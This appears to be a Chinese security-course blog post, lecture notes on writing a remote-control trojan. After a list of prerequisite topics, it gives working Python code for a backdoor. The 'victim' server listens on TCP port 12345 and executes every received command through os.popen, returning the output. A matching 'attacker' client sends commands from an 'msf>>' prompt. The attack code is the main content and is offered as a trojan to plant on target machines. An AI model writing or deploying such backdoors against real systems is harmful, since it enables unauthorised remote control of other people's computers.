T3SEC —–第十一讲:自编木马实战

{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}

自编 进入环境后可不依赖其他工具

自编远程控制电脑木马

涉及知识或技术:

操作系统

  • win/linux/unix/android ........
  • 命令,服务,特性.

网络协议

  • osi七层网络
  • tcp/ip 协议族群
    • 应用层
    • 传输层:tcp/udp
    • 网络层
    • 链路层

实用的程序语言

  • python
  • go
  • ruby
  • html,js
    • 环境简单
    • 弱规则语言
    • 第三方强大的标准库
    • 以及自定义的库或模块

打包工具

线上学习要素: 圈子(学习圈子),学什么怎么学,学习效果,拜师..

被攻击机:

#server:放在被攻击机-木马
#gui-dos-cmd

import os
from socket import *

#创建一个连接tcp
#

qq=socket(AF_INET,SOCK_STREAM)

#绑定主机ip
address = ("",12345)
qq.bind(address)

#监听
qq.listen(5)

while True:
    pass
    newsct,clientsct=qq.accept()
    while True:
        cmd = newsct.recv(4096)
        #判断cmd是否有内容
        if len(cmd)>0:
            print("console:"+cmd.decode("utf-8"))
            #以下可做控制操作
            res=os.popen(cmd.decode('utf-8'),'r')
            newsct.send(res.read().encode('utf-8'))
            res.close()
        else:
            break
newsct.close()

攻击机:

#client
#控制端

from socket import *

#创建socket内容
tcpsocket=socket(AF_INET,SOCK_STREAM)

#连接
serAddress=('127.0.0.1',12345)
tcpsocket.connect(serAddress)

#操作
while True:
    sendcmd=input("msf>>")
    if len(sendcmd)>0:
        tcpsocket.send(sendcmd.encode('utf-8'))
    else:
        break
    #/接受执行后结果
    recv=tcpsocket.recv(4096)
    print(recv.decode('utf-8'))
#关闭socket
tcpsocket.close()

Q.E.D.